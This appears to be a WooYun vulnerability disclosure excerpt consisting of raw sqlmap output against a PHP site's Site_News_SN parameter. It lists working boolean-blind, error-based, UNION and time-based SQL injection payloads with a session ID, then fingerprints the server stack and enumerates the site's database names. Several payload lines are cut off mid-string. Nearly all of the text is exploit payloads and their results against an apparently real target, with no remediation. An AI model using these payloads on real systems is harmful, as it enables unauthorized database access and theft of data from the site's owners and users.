WooYun.org

Place: GET
Parameter: Site_News_SN
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: Company_SN=21779&Site_News_SN=4779 AND 8188=8188&PHPSE
ctv9mttsq0p18gva43
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: Company_SN=21779&Site_News_SN=4779 AND (SELECT 2781 FR
NT(*),CONCAT(0x3a7a63733a,(SELECT (CASE WHEN (2781=2781) THEN 1 ELS
a7668683a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS
)&PHPSESSID=9nej773dctv9mttsq0p18gva43
    Type: UNION query
    Title: MySQL UNION query (NULL) - 10 columns
    Payload: Company_SN=21779&Site_News_SN=-8878 UNION SELECT NULL,
(0x3a7a63733a,0x6b776a51534b6f495262,0x3a7668683a), NULL, NULL, NUL
, NULL, NULL#&PHPSESSID=9nej773dctv9mttsq0p18gva43
    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: Company_SN=21779&Site_News_SN=4779 AND SLEEP(5)&PHPSES
tv9mttsq0p18gva43
---
[21:40:50] [INFO] the back-end DBMS is MySQL
web server operating system: Linux CentOS 5
web application technology: Apache 2.2.3, PHP 5.3.16
back-end DBMS: MySQL 5.0
[21:40:50] [INFO] fetching database names
[21:40:50] [INFO] the SQL query used returns 4 entries
[21:40:51] [INFO] retrieved: "information_schema"
[21:40:51] [INFO] retrieved: "muchcalm"
[21:40:52] [INFO] retrieved: "twinner"
[21:40:52] [INFO] retrieved: "twinner_dev"
available databases [4]:
[*] information_schema
[*] muchcalm
[*] twinner
[*] twinner_dev